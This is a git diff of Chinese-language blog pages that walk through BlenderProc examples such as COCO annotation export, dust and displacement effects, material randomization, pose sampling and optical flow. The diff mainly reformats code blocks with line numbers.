    # 如果找不到 key 为 segmap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块
    raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module before?")

    if not colors:
    # Find path pattern of rgb images
    # 如果 colors 列表为空,则该代码会查找 RGB 图像的路径
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
    # 如果找不到 key 为 rgb_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 RgbRenderer 模块
    raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
    f"ran the RgbRenderer module before?")

    if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # 如果 instance_attribute_maps 列表为空,则该代码会查找实例分割图像到名称、类别标签的映射文件的路径
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
    # 如果找不到 key 为 segcolormap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块,并将 map_by 参数设置为 instance
    raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

    -
    # 用于确定输出的 COCO 格式注释文件的路径,并在需要追加输出时计算图像编号的偏移量
    coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
    # Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
    if append_to_existing_output and os.path.exists(coco_annotations_path):
    # 如果 append_to_existing_output 为 True,且文件系统中存在名为 'coco_annotations.json' 的文件,则将其加载到内存中
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
    existing_coco_annotations = json.load(fp)
    # 获取已存在图像 ID 的最大值,并加 1 作为图像编号的偏移量。这可以确保新生成的注释不会与已有的注释文件重复。
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
    else:
    # 如果 append_to_existing_output 参数为 False 或没有找到现有的注释文件,则图像编号的偏移量为 0,并且 existing_coco_annotations 变量设置为 None
    image_offset = 0
    existing_coco_annotations = None
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 用于确定输出的 COCO 格式注释文件的路径,并在需要追加输出时计算图像编号的偏移量
    coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
    # Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
    if append_to_existing_output and os.path.exists(coco_annotations_path):
    # 如果 append_to_existing_output 为 True,且文件系统中存在名为 'coco_annotations.json' 的文件,则将其加载到内存中
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
    existing_coco_annotations = json.load(fp)
    # 获取已存在图像 ID 的最大值,并加 1 作为图像编号的偏移量。这可以确保新生成的注释不会与已有的注释文件重复。
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
    else:
    # 如果 append_to_existing_output 参数为 False 或没有找到现有的注释文件,则图像编号的偏移量为 0,并且 existing_coco_annotations 变量设置为 None
    image_offset = 0
    existing_coco_annotations = None

    -
    # collect all RGB paths
    new_coco_image_paths = []
    # collect all mappings from csv (backwards compat)
    segcolormaps = []
    # collect all instance segmaps (backwards compat)
    inst_segmaps = []

    # for each rendered frame
    # 遍历从 bpy.context.scene.frame_start 到 bpy.context.scene.frame_end 的每一帧
    for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # 如果 instance_attribute_maps 列表为空,则读取映射文件(segcolormap_output)以获取对象名称/类别到整数的映射,将其存储在 segcolormaps 列表中
    if not instance_attribute_maps:
    # read colormappings, which include object name/class to integer mapping
    segcolormap = []
    with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
    reader = csv.DictReader(csvfile)
    for mapping in reader:
    segcolormap.append(mapping)
    segcolormaps.append(segcolormap)

    # 如果 instance_segmaps 列表为空,则读取分割图像文件(segmentation_map_output)并提取实例通道(即 channel_instance),将实例分割图像存储在 inst_segmaps 列表中
    if not instance_segmaps:
    # Load segmaps (backwards compat)
    segmap = np.load(segmentation_map_output["path"] % frame)
    inst_channel = int(segcolormap[0]['channel_instance'])
    inst_segmaps.append(segmap[:, :, inst_channel])

    # 如果 colors 列表非空,则该代码调用 opencv 库的 imwrite() 函数将 RGB 图像(颜色渲染图像)写入目标路径,具体路径由 file_prefix 和偏移量计算得到
    if colors:
    color_rgb = colors[frame - bpy.context.scene.frame_start]

    # Reverse channel order for opencv
    color_bgr = color_rgb.copy()
    color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

    if color_file_format == 'PNG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr)
    elif color_file_format == 'JPEG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
    else:
    raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
    # 如果没有特定的颜色方案,则直接复制 RGB 渲染图像到目标路径
    source_path = rgb_output["path"] % frame
    target_base_path = os.path.join('images',
    file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
    target_path = os.path.join(output_dir, target_base_path)
    shutil.copyfile(source_path, target_path)

    # 将目标路径(target_path)添加到 new_coco_image_paths 数组中,并在 COCO 格式注释中使用这个数组
    new_coco_image_paths.append(target_base_path)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    # collect all RGB paths
    new_coco_image_paths = []
    # collect all mappings from csv (backwards compat)
    segcolormaps = []
    # collect all instance segmaps (backwards compat)
    inst_segmaps = []

    # for each rendered frame
    # 遍历从 bpy.context.scene.frame_start 到 bpy.context.scene.frame_end 的每一帧
    for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # 如果 instance_attribute_maps 列表为空,则读取映射文件(segcolormap_output)以获取对象名称/类别到整数的映射,将其存储在 segcolormaps 列表中
    if not instance_attribute_maps:
    # read colormappings, which include object name/class to integer mapping
    segcolormap = []
    with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
    reader = csv.DictReader(csvfile)
    for mapping in reader:
    segcolormap.append(mapping)
    segcolormaps.append(segcolormap)

    # 如果 instance_segmaps 列表为空,则读取分割图像文件(segmentation_map_output)并提取实例通道(即 channel_instance),将实例分割图像存储在 inst_segmaps 列表中
    if not instance_segmaps:
    # Load segmaps (backwards compat)
    segmap = np.load(segmentation_map_output["path"] % frame)
    inst_channel = int(segcolormap[0]['channel_instance'])
    inst_segmaps.append(segmap[:, :, inst_channel])

    # 如果 colors 列表非空,则该代码调用 opencv 库的 imwrite() 函数将 RGB 图像(颜色渲染图像)写入目标路径,具体路径由 file_prefix 和偏移量计算得到
    if colors:
    color_rgb = colors[frame - bpy.context.scene.frame_start]

    # Reverse channel order for opencv
    color_bgr = color_rgb.copy()
    color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

    if color_file_format == 'PNG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr)
    elif color_file_format == 'JPEG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
    else:
    raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
    # 如果没有特定的颜色方案,则直接复制 RGB 渲染图像到目标路径
    source_path = rgb_output["path"] % frame
    target_base_path = os.path.join('images',
    file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
    target_path = os.path.join(output_dir, target_base_path)
    shutil.copyfile(source_path, target_path)

    # 将目标路径(target_path)添加到 new_coco_image_paths 数组中,并在 COCO 格式注释中使用这个数组
    new_coco_image_paths.append(target_base_path)

    -
    instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
    instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

    coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
    instance_attribute_maps,
    new_coco_image_paths,
    supercategory,
    mask_encoding_format,
    existing_coco_annotations,
    label_mapping)

    print("Writing coco annotations to " + coco_annotations_path)
    with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
    instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

    coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
    instance_attribute_maps,
    new_coco_image_paths,
    supercategory,
    mask_encoding_format,
    existing_coco_annotations,
    label_mapping)

    print("Writing coco annotations to " + coco_annotations_path)
    with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)

    这段代码将收集到的实例分割图像、属性映射文件、图像路径和其他参数传递给 _CocoWriterUtility.generate_coco_annotations() 函数,生成符合 COCO 格式的注释。如果存在旧的 COCO 格式的注释(即 existing_coco_annotations),则将其合并到生成的注释中。

    最后,将这些注释写入给定的 coco_annotations_path 文件中,并在控制台中输出写入的文件路径。

    Diffuse color image

    Usage

    -
    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    +
    1
    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

    -
    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5
    +
    1
    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5

    png

    Code

    -
    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()
    +
    1
    2
    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()

    How to apply dust to objects

    Usage

    -
    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    +
    1
    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
    • resources/haven/models/ArmChair_01/ArmChair_01.blend: Path to the blend file, from the haven dataset, browse the model folder, for all possible options
    • @@ -569,14 +567,14 @@

      Usage

      png

      png

      设置好路径开跑!

      -
      blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output
      +
      1
      blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

      然后就寄,不明白为什么这里 glob.glob 会返回空列表,换个代码重写,然后这坨臭臭代码就能跑了。

      png

      Visualization

      -
      blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5
      +
      1
      blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5

      png

      Code

      -
      # load the objects into the scene
      obj = bproc.loader.load_blend(args.model)[0]

      haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
      bproc.world.set_world_background_hdr_img(haven_hdri_path)
      +
      1
      2
      3
      4
      5
      # load the objects into the scene
      obj = bproc.loader.load_blend(args.model)[0]

      haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
      bproc.world.set_world_background_hdr_img(haven_hdri_path)
      1. 使用 bproc.loader.load_blend(args.model) 函数加载在 args.model 变量中指定的 Blender 模型文件。该函数返回一个对象列表,我们将其中的第一个对象存储在变量 obj 中。
      2. @@ -585,7 +583,7 @@

        Code


      -
      # Add dust to all materials of the loaded object
      for material in obj.get_materials():
      bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)
      +
      1
      2
      3
      # Add dust to all materials of the loaded object
      for material in obj.get_materials():
      bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

      这段代码的作用是向已经加载到 Blender 中的模型对象的所有材质(material)中添加灰尘效果。

      具体而言,代码执行了以下几个步骤:

      @@ -608,12 +606,12 @@

      Code

      Object selection and manipulation using displacement modifier

      该示例演示了如何使用不同纹理添加不同位移修饰符作为 EntityManipulator 模块的一部分来操作实体。

      Usage

      -
      blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output
      +
      1
      blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

      Visualization

      -
      blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5
      +
      1
      blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5

      png

      Code

      -
      # Add displacement to all objects
      for obj in objs:
      # Create a uv mapping based on a cylinder projection
      obj.add_uv_mapping("cylinder")

      # Create a random procedural texture
      texture = bproc.material.create_procedural_texture('CLOUDS')
      # Displace the vertices of the object based on that random texture
      obj.add_displace_modifier(
      texture=texture,
      strength=random.gauss(0, 0.5),
      subdiv_level=random.randint(1, 3),
      )
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      # Add displacement to all objects
      for obj in objs:
      # Create a uv mapping based on a cylinder projection
      obj.add_uv_mapping("cylinder")

      # Create a random procedural texture
      texture = bproc.material.create_procedural_texture('CLOUDS')
      # Displace the vertices of the object based on that random texture
      obj.add_displace_modifier(
      texture=texture,
      strength=random.gauss(0, 0.5),
      subdiv_level=random.randint(1, 3),
      )

      如果一个对象没有 UV 映射,我们将添加一个,因为它对于将位移纹理映射到对象是必要的。对于 UV 映射,我们选择使用 projection。Blender 给出的可能的投影类型有:“cube”、“cylinder”、“smart” 和 “sphere”。

      然后,我们为每个实体添加了一个带有随机纹理的位移修饰符。

        @@ -627,13 +625,13 @@

        Usage

        Standard Scene:

        -
        blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output
        +
        1
        blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output

        png

        simple calibration image by loading intrinsics and extrinsics from a file:

        -
        blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output
        +
        1
        blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output

        png

        fairly distorted image:

        -
        blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output
        +
        1
        blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output

        png

        • 加载对象;将它们定位到世界参考帧的原点。
        • @@ -648,7 +646,7 @@

          Usage

        Material Randomization

        Usage

        -
        blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
        +
        1
        blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
        • examples/advanced/material_randomizer/main.py: path to the main python file to run.
        • examples/resources/scene.obj: path to the object file with the basic scene.
        • @@ -659,7 +657,7 @@

          Visualizaton

          png

          png

          Code

          -
          # Collect all materials
          materials = bproc.material.collect_all()

          # Go through all objects
          for obj in objs:
          # For each material of the object
          for i in range(len(obj.get_materials())):
          # In 50% of all cases
          if np.random.uniform(0, 1) <= 0.5:
          # Replace the material with a random one
          obj.set_material(i, random.choice(materials))
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          # Collect all materials
          materials = bproc.material.collect_all()

          # Go through all objects
          for obj in objs:
          # For each material of the object
          for i in range(len(obj.get_materials())):
          # In 50% of all cases
          if np.random.uniform(0, 1) <= 0.5:
          # Replace the material with a random one
          obj.set_material(i, random.choice(materials))

          这段代码的作用是对已经加载到 Blender 中的所有对象进行操作,随机替换这些对象的材质。

          具体而言,代码执行了以下几个步骤:

          @@ -674,14 +672,14 @@

          Code

          Motion Blur and Rolling Shutter

          在这个例子中,我们展示如何生成运动模糊和滚动快门效果。

          这些效果是可见的,如果相机或对象在帧之间移动。相机在物体静止的情况下经历以下运动:

          -
          0 -10 4 1.3 0 0 # initial position
          0 -15 4 1.3 0 0 # moving away from object
          5 -15 4 1.3 0 0 # moving to the right
          5 -15 8 1.3 0 0 # moving upwards
          1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)
          +
          1
          2
          3
          4
          5
          0 -10 4 1.3 0 0 # initial position
          0 -15 4 1.3 0 0 # moving away from object
          5 -15 4 1.3 0 0 # moving to the right
          5 -15 8 1.3 0 0 # moving upwards
          1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

          Usage

          -
          blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output
          +
          1
          blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

          跑不动,西内。

          Object pose sampling

          这个例子的重点是介绍 object.ObjectPoseSampler,它允许在采样体积内进行带有碰撞检查的对象姿态采样。

          Usage

          -
          blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
          +
          1
          blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
          • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
          • examples/resources/camera_positions: text file with parameters of camera positions.
          • @@ -689,15 +687,15 @@

            Usage

          • examples/advanced/object_pose_sampling/output: path to the output directory.

          Visualization

          -
          blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5
          +
          1
          blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5

          png

          Code

          -
          # Define a function that samples the pose of a given object
          def sample_pose(obj: bproc.types.MeshObject):
          obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
          obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

          # Sample the poses of all objects, while making sure that no objects collide with each other.
          bproc.object.sample_poses(
          objs,
          sample_pose_func=sample_pose,
          objects_to_check_collisions=objs
          )
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          # Define a function that samples the pose of a given object
          def sample_pose(obj: bproc.types.MeshObject):
          obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
          obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

          # Sample the poses of all objects, while making sure that no objects collide with each other.
          bproc.object.sample_poses(
          objs,
          sample_pose_func=sample_pose,
          objects_to_check_collisions=objs
          )

          定义一个函数,采样并设置对象的位置和旋转。对象被放置在采样的姿态上,并对 objects_to_check_collisions 指定的所有对象执行碰撞检查(默认为所有对象)。如果发生碰撞,位置将被重置,并尝试重新采样。最大尝试次数可以由 max_tries 定义。

          On surface object pose Sampling

          这个示例的重点是 OnSurfaceSampler,它允许对所选表面上的某些对象进行姿态采样。

          Usage

          -
          blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
          +
          1
          blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
          • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
          • examples/resources/camera_positions: text file with parameters of camera positions.
          • @@ -705,11 +703,11 @@

            Usage

          • examples/advanced/on_surface_object_sampling/output: path to the output directory.

          Visualization

          -
          blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5
          +
          1
          blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5

          png

          png

          Code

          -
          # Define a function that samples the pose of a given object
          def sample_pose(obj: bproc.types.MeshObject):
          # Sample the spheres location above the surface
          obj.set_location(bproc.sampler.upper_region(
          objects_to_sample_on=[surface],
          min_height=1,
          max_height=4,
          use_ray_trace_check=False
          ))
          obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          # Define a function that samples the pose of a given object
          def sample_pose(obj: bproc.types.MeshObject):
          # Sample the spheres location above the surface
          obj.set_location(bproc.sampler.upper_region(
          objects_to_sample_on=[surface],
          min_height=1,
          max_height=4,
          use_ray_trace_check=False
          ))
          obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

          这段代码的作用是定义一个函数 sample_pose,并使用该函数对已经加载到 Blender 中的模型对象进行姿态采样操作。

          具体而言,代码执行了以下几个步骤:

            @@ -728,18 +726,18 @@

            Code

          1. 在完成函数定义后,该函数可以用于对已经加载到 Blender 中的模型对象进行位置采样和姿态采样操作,从而增加渲染效果的多样性和逼真性,特别是当需要将某个物体放置在表面上方时。

          因此,这段代码提供了一种简单的方法来对模型对象进行采样操作,并可扩展成复杂的采样逻辑,从而为渲染器提供更加丰富和逼真的场景渲染效果。

          -
          # Sample the spheres on the surface
          spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)
          +
          1
          2
          # Sample the spheres on the surface
          spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

          设置刚体:

          -
          # Enable physics for spheres (active) and the surface (passive)
          for sphere in spheres:
          sphere.enable_rigidbody(True)
          surface.enable_rigidbody(False)
          +
          1
          2
          3
          4
          # Enable physics for spheres (active) and the surface (passive)
          for sphere in spheres:
          sphere.enable_rigidbody(True)
          surface.enable_rigidbody(False)

          物理模拟:

          -
          # Run the physics simulation
          bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)
          +
          1
          2
          # Run the physics simulation
          bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

          Optical Flow

          在本示例中,我们演示了如何获取连续关键帧之间的前向/后向流值。

          如果相机或物体在帧之间移动,则流会变得可见。在这里,相机经过以下运动:

          -
          0 -10 4 1.3 0 0  # initial position
          0 -12 4 1.3 0 0 # moving away from object
          2 -12 4 1.3 0 0 # moving to the right
          2 -12 6 1.3 0 0 # moving upwards
          1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)
          +
          1
          2
          3
          4
          5
          0 -10 4 1.3 0 0  # initial position
          0 -12 4 1.3 0 0 # moving away from object
          2 -12 4 1.3 0 0 # moving to the right
          2 -12 6 1.3 0 0 # moving upwards
          1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

          Usage

          -
          blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
          +
          1
          blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
          • examples/advanced/optical_flow/main.py: path to the main python file to run.
          • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
          • @@ -747,10 +745,10 @@

            Usage

          • examples/advanced/optical_flow/output: path to the output directory.

          Usage

          -
          blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5
          +
          1
          blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5

          png

          Code

          -
          # Render the optical flow (forward and backward) for all frames
          data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
          +
          1
          2
          # Render the optical flow (forward and backward) for all frames
          data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
          • 遍历所有相机位姿并渲染前向和/或后向光流。
          • 使用 .exr 格式渲染图像,该格式允许线性颜色空间和更高的精度,然后将其转换为 numpy.float32 数组。
          • @@ -765,7 +763,7 @@

            Random Backgro

            jpg

            在这个例子中,我们生成了一个物体 (Suzanne) 的渲染图像,并将它们粘贴到随机的背景图像上,随机化对象的位置、方向、材质属性和照明。这是一种简单的方法来生成用于训练分类、物体检测和分割任务的数据。它易于实现和使用,但与实际 3D 场景中的物体渲染相比通常会导致较差的结果。

            Usage

            -
            blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
            +
            1
            blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
            • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
            • examples/advanced/random_backgrounds/object.ply: path to the object file.
            • @@ -773,10 +771,10 @@

              Usage

            emmm就是渲染一个不含背景的图片,然后把背景换成其他的。

            然后再:

            -
            python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite
            +
            1
            python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

            添加背景。

            Code

            -
            # Enable transparency so the background becomes transparent
            bproc.renderer.set_output_format(enable_transparency=True)
            +
            1
            2
            # Enable transparency so the background becomes transparent
            bproc.renderer.set_output_format(enable_transparency=True)

            这段代码的作用是启用 Blender 内置渲染器的透明背景功能,使得渲染输出结果中的背景变为透明的。

            具体而言,代码执行了以下操作:

            @@ -792,11 +790,11 @@

            Rand

            这两者都需要使用才能使用此示例。

            又不好下载,give up!

            Code

            -
            # Load materials and objects that can be placed into the room
            materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
            interior_objects = []
            for i in range(15):
            interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))
            +
            1
            2
            3
            4
            5
            # Load materials and objects that can be placed into the room
            materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
            interior_objects = []
            for i in range(15):
            interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

            通过脚本下载了 cctextures,这里仅使用名称列表中包含其中一个名称的资产。这使得它更加真实,因为像 "Asphalt" 这样的东西通常不会在室内发现。此外,也从指定的 Ikea 数据集类别中加载了 15 个对象。

            -
            # Construct random room and fill with interior_objects
            objects = bproc.constructor.construct_random_room(used_floor_area=25,
            interior_objects=interior_objects,
            materials=materials, amount_of_extrusions=5)
            +
            1
            2
            3
            4
            # Construct random room and fill with interior_objects
            objects = bproc.constructor.construct_random_room(used_floor_area=25,
            interior_objects=interior_objects,
            materials=materials, amount_of_extrusions=5)

            construct_random_room 构建了一个随机的地面平面,并构建了相应的墙壁和天花板。它将加载的 Ikea 对象随机放置在位置,并设置 cc-texture 材料。房间的地面面积为 25 平方米,它最多有 5 个挤出。挤出是一种走廊,它从中间的基本矩形中伸出。它们可以更宽或更窄,但永远不会小于最小的 corridor_width。模块将自动将 25 平方米分配到所有挤出部分中。

            -
            # Bring light into the room
            bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)
            +
            1
            2
            # Bring light into the room
            bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

            让天花板发光,并移除放置在其上的任何材料。

@@ -4659,6 +4657,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-BlenderProc Examples overview-Basic Examples/index.html b/posts/Blender-BlenderProc Examples overview-Basic Examples/index.html index 6830d1c2a5..607f31649f 100644 --- a/posts/Blender-BlenderProc Examples overview-Basic Examples/index.html +++ b/posts/Blender-BlenderProc Examples overview-Basic Examples/index.html @@ -44,8 +44,6 @@ - - @@ -407,16 +405,16 @@

正文

Basic example

Usage

示例代码在 examples/basics/basic/main.py 中。shell 中输入:

-
blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output
+
1
blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

即可开跑!我说婷婷,会报错:

-
It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
Gonna try to download it automatically.
Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
Error while fetching file: <urlopen error timed out>.
